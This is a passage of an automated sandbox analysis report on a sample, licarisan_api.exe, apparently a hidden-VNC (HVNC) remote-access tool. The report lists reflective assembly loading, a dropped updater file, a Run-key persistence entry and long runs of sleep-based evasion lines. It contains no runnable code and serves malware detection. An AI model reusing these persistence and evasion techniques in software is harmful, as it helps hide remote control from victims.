                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                  Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: licarisan_api.exe Static file information: File size 4038008 > 1048576
                  Source: licarisan_api.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x312e00
                  Source: Binary string: H:\HVNC VELOCITY\Velocity (2)\Velocity\HVNC Source\NewDLL\DLL\obj\Release\DLL.pdb source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: H:\HVNC VELOCITY\Velocity (2)\Velocity\HVNC Source\NewDLL\DLL\obj\Release\DLL.pdbJ source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2A4ZY3PGYZLX.cs .Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: 10.2.csc.exe.852cc18.1.raw.unpack, HVNC.cs .Net Code: listitems System.AppDomain.Load(byte[])
                  Source: C:\Users\user\Desktop\licarisan_api.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_00425A27 push edi; ret 0_2_00425AAE
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_007B3C5D push ds; retn 0000h 0_2_007B3C62
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_007BDF32 push ss; iretd 0_2_007BDF3E
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_007CB47E pushfd; retf 0_2_007CB480
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_007CB4E4 pushfd; retf 0_2_007CB4E6
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_007CD136 push eax; retf 0_2_007CD138
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_007CCF7E push esp; retf 0_2_007CCF7F
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_007CCF19 push esp; retf 0_2_007CCF1E
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_007CCF8D push eax; retf 0_2_007CCF8E
                  Source: C:\Users\user\Desktop\licarisan_api.exe Code function: 0_2_007FCBF7 push 81000066h; retf 0_2_007FCBFC
                  Source: C:\Users\user\Desktop\licarisan_api.exe File created: C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exe
                  Source: C:\Users\user\Desktop\licarisan_api.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OcuulusUpdater

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Memory allocated: 5820000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Memory allocated: 7440000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Memory allocated: 7080000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Memory allocated: 12E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Memory allocated: 2FC0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Memory allocated: 1530000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 599668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 599323
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 599218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 599109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 598962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 598842
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 598734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 598619
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 598203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 597719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 597578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 597468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 597359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 597250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 597140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 597031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 596922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 596812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 596703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 596593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 596484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 596374
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 596264
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 596155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 596046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 595937
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 595827
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 595718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 595598
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 595463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 595062
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 594788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 594672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 594562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 594453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 594341
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 594233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 594118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 594012
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 593905
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 593796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 593683
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 593577
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 593468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 593356
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 593250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 593138
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 593031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 592921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Thread delayed: delay time: 592812
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Window / User API: threadDelayed 5310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe; Window / User API: threadDelayed 4440
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5092
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 525
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4662
                  Source: C:\Users\user\Desktop\licarisan_api.exe; Dropped PE file which has not been started: C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7604; Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 7644; Thread sleep time: -50000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep count: 34 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -31359464925306218s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 6068; Thread sleep count: 5310 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -599890s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -599781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -599668s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 6068; Thread sleep count: 4440 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -599562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -599453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -599323s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -599218s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -599109s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -598962s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868; Thread sleep time: -598842s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -598734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -598619s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597250s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597140s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -597031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596922s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596593s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596374s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596264s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596155s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -596046s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595827s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595718s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595598s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595463s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -595062s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594788s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594341s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594233s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594118s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -594012s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593905s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593796s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593683s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593577s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593356s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593250s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593138s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -593031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -592921s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 2868Thread sleep time: -592812s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 5092 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1648Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep count: 525 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep count: 4662 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep count: 234 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599668Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599323Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598962Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598842Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598619Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597359Jump to behavior
